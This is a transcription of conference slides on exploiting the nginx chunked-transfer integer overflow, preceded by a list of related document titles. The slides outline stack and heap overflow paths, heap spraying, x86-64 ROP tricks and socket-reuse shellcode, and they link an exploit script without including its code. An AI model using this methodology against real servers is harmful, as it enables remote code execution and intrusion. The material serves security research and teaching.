Exploiting nginx chunked overflow bug, the undisclosed attack vector

Similar documents

Bypassing Memory Protections: The Future of Exploitation

Bypassing Browser Memory Protections in Windows Vista

I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation. Mathias Payer, ETH Zurich

telnetd exploit FreeBSD Telnetd Remote Exploit Für Compass Security AG Öffentliche Version 1.0 Januar 2012

ASL IT SECURITY XTREME XPLOIT DEVELOPMENT

Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement. MJ0011 th_decoder@126.com

Tuning WebSphere Application Server ND 7.0. Royal Cyber Inc.

Practical taint analysis for protecting buggy binaries

Google Apps Engine. G-Jacking AppEngine-based applications. Presented 30/05/2014. For HITB 2014 By Nicolas Collignon and Samir Megueddem

Modern Binary Exploitation Course Syllabus

ERNW Newsletter 51 / September 2015

Custom Penetration Testing

64-Bit NASM Notes. Invoking 64-Bit NASM

Hacking your perimeter. Social-Engineering. Not everyone needs to use zero. David Kennedy (ReL1K) Twitter: Dave_ReL1K

Bug hunting. Vulnerability finding methods in Windows 32 environments compared. FX of Phenoelit

Lecture 26: Obfuscation

Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc

Compromise-as-a-Service

SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING. Presented by: Dave Kennedy Eric Smith

Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail

EMET 4.0 PKI MITIGATION. Neil Sikka DefCon 21

Penetration Testing with Kali Linux

XNU:asecurityevaluation

Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>

Application Denial of Service Is it Really That Easy?

Security & Exploitation

Attacking Hypervisors via Firmware and Hardware

Monitoring Nginx Server

Dynamic Behavior Analysis Using Binary Instrumentation

風水. Heap Feng Shui in JavaScript. Alexander Sotirov.

============================================================= =============================================================

Linux exploit development part 2 (rev 2) - Real app demo (part 2)

Sandy. The Malicious Exploit Analysis. Static Analysis and Dynamic exploit analysis. Garage4Hackers

CVE Adobe Flash Player Integer Overflow Vulnerability Analysis

CSC 2405: Computer Systems II

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code

PHP web serving study Performance report

Review and Exploit Neglected Attack Surface in ios 8. Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU

Intro to Load-Balancing Tomcat with httpd and mod_jk

MSc Computer Science Dissertation

TFE listener architecture. Matt Klein, Staff Software Engineer Twitter Front End

Lecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z)

From SQL Injection to MIPS Overflows

Bypassing Windows Hardware-enforced Data Execution Prevention

Painless Web Proxying with Apache mod_proxy

A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge

Testing for Security

Learn Ethical Hacking, Become a Pentester

Attacking Hypervisors via Firmware and Hardware

WHITEPAPER. Nessus Exploit Integration

HOW I MET YOUR MODEM EXPLOIT & TROJAN DEV FOR CONSUMER DSL DEVICES HACK IN THE BOX 2013 AMSTERDAM - PETER GEISSLER & STEVEN KETELAAR

Software Vulnerabilities

Serving Media with NGINX Plus

Extending Tizen Native Framework with Node.js

Return-oriented programming without returns

Computer Security: Principles and Practice

Common Server Setups For Your Web Application - Part II

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

PHP on IBM i: What s New with Zend Server 5 for IBM i

IERG 4080 Building Scalable Internet-based Services

WebLogic Server Admin

Attacking Obfuscated Code with IDA Pro. Chris Eagle

Where s the FEEB? The Effectiveness of Instruction Set Randomization

Attacking Host Intrusion Prevention Systems. Eugene Tsyrklevich

Varnish the Drupal way

CS 161 Computer Security

Unix Security Technologies: Host Security Tools. Peter Markowsky <peterm[at]ccs.neu.edu>

Lecture 10: Dynamic Memory Allocation 1: Into the jaws of malloc()

An introduction to the Return Oriented Programming. Why and How

Introducing the Microsoft IIS deployment guide

Leak Check Version 2.1 for Linux TM

Security Products Development. Leon Juranic

F-Secure Internet Security 2014 Data Transfer Declaration

ZEN LOAD BALANCER EE v3.02 DATASHEET The Load Balancing made easy

MAGENTO HOSTING Progressive Server Performance Improvements

Java Troubleshooting and Performance

Firefox, Opera, Safari for Windows BMP file handling information leak. September Discovered by: Mateusz j00ru Jurczyk, Hispasec Labs

Pwning Intranets with HTML5

Encrypting MySQL data at Google. Jonas Oreland and Jeremy Cole

Safety measures in Linux

Advanced Endpoint Protection Overview

One Server Per City: C Using TCP for Very Large SIP Servers. Kumiko Ono Henning Schulzrinne {kumiko, hgs}@cs.columbia.edu

eggon SDK for ios 7 Integration Instructions

SoK: Eternal War in Memory

Eugene Tsyrklevich. Ozone HIPS: Unbreakable Windows

A perspective to incident response or another set of recommendations for malware authors

Apache Tomcat. Load-balancing and Clustering. Mark Thomas, 20 November Pivotal Software, Inc. All rights reserved.

Introduction to Information Security

elearning for Secure Application Development

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP

IPMI: Understanding Your Server s Remote Backdoor

Java Program Vulnerabilities

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

How To Protect Your Computer From Being Hacked By A Hacker (For A Fee)

How To Use Powerhell For Security Research

Transcription:

Exploiting nginx chunked overflow bug, the undisclosed attack vector Long Le longld@vnsecurity.net

About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET

In this talk Nginx brief introduction Nginx chunked overflow bug The analysis The exploit The undisclosed attack vector x86-64 ROP tricks Demo 3 VNSECURITY.NET

Nginx [engine x] HTTP and reverse proxy server Fast, light-weight Popular 4 VNSECURITY.NET

Nginx architecture Non-blocking IO Event driven Single threaded Single master, multiple workers Resources efficient Highly modular ref: http://www.slideshare.net/joshzhu/nginx-internals 5 VNSECURITY.NET

Nginx architecture big picture ref: http://www.aosabook.org/images/nginx/architecture.png 6 VNSECURITY.NET

The vulnerability http://en.wikipedia.org/wiki/integer_overflow 7 VNSECURITY.NET

The analysis (1) HTTP header: Transfer-Encoding: chunked 8 VNSECURITY.NET

The analysis (2) 9 VNSECURITY.NET

The analysis (3) 10 VNSECURITY.NET

The analysis (4) stack based overflow 11 VNSECURITY.NET

The exploit Stack cookie bruteforcing May require hundred/thousand of connections Noisy error logs nginx < 1.4.1 binaries from nginx.org has no stack cookie ASLR return to binary Default is non PIE NX ROP https://github.com/danghvu/nginx-1.4.0/blob/master/exp-nginx.rb 12 VNSECURITY.NET

The humble mitigation 13 VNSECURITY.NET

Quick summary Default nginx settings (static contents) Stack based overflow Straight to exploit Stack cookie slows down attack 14 VNSECURITY.NET

Practical Nginx deployment Nginx + FastCGI backend E.g: Wordpress Nginx + Apache/Lighttpd Reverse proxy 15 VNSECURITY.NET

The undisclosed attack vector Same vulnerability Different configuration More targets Heap based overflow! No worry about stack cookie Not straight to exploit 16 VNSECURITY.NET

The analysis (1) 17 VNSECURITY.NET

The analysis (2) 18 VNSECURITY.NET

The analysis (3) 19 VNSECURITY.NET

The analysis (4) 20 VNSECURITY.NET

The analysis (5) heap based overflow 21 VNSECURITY.NET

POC trigger 22 VNSECURITY.NET

Crash dump 23 VNSECURITY.NET

The exploit Send enough data Crafted payload to pass some checks ROP stuff Run n Pray! It s unreliable 24 VNSECURITY.NET

The unreliable issue Interfered by events Connections coming Connections have data Connections closing Heap metadata corruption Nginx internal pool libc Difficult to debug Event driven 25 VNSECURITY.NET

Crash madness VNSECURITY.NET

Nginx internals (1) ref: http://www.slideshare.net/joshzhu/nginx-internals 27 VNSECURITY.NET

Nginx internals (2) 28 VNSECURITY.NET

Nginx internals (3) 29 VNSECURITY.NET

The solution Heap spraying Open many connections Force each connection to allocate large chunk Reserve contiguous memory Overflow the handler and trigger read_event_handler() Send more data to trigger read event 30 VNSECURITY.NET

The refined POC 31 VNSECURITY.NET

Heap spraying (1) 32 VNSECURITY.NET

Heap spraying (2) header N buffer N header N+1 buffer N+1 header N+2 33 VNSECURITY.NET

Overflow the handler (1) header N buffer N header N+1 buffer N+1 header N+2 34 VNSECURITY.NET

Overflow the handler (2) 35 VNSECURITY.NET

The refined exploit Open N connections (e.g N=32) All connections send the chunk trigger For connections from N/2 to N send same ROP payload Jump to controlled, contiguous memory before overflowing 36 VNSECURITY.NET

x86-64 ROP tricks (1) Use 32-bits gadgets Heap address is 32-bits xchg rsp, rax xchg esp, eax 37 VNSECURITY.NET

x86-64 ROP tricks (2) RET blocks RIP call [rax+0x30] RAX heap payload RAX RIP ret ret ret ret ret pop_ret xchg_ret real payload address growth 38 VNSECURITY.NET

x86-64 ROP tricks (3) Use less argument functions for ret2plt, ret2libc mprotect() vs mmap64() mmap64() rdi => address rsi => size rdx => proto rcx => flags r8 => fd r9 => offset mprotect() rdi => address rsi => size rdx => proto libc offset: mprotect mmap = 0x60 39 VNSECURITY.NET

Shellcode tricks Continue to serve normal HTTP requests fork() then parent exit() Advanced socket reuse stage-1: fd hunting loop read from fd 1 1024 check for tag jump to stage-2 with found fd stage-2: normal socket reuse shell 40 VNSECURITY.NET

Demo 41 VNSECURITY.NET

Conclusion We found another (now known) attack vector of the ngxin chunked overflow bug Not only stack based overflow Impact to almost practical deployments We built a reliable heap based overflow exploit No worry about stack cookie bruteforcing Fast to gain shell Exploit on x86 should be the same but easier 42 VNSECURITY.NET

Questions? 43 VNSECURITY.NET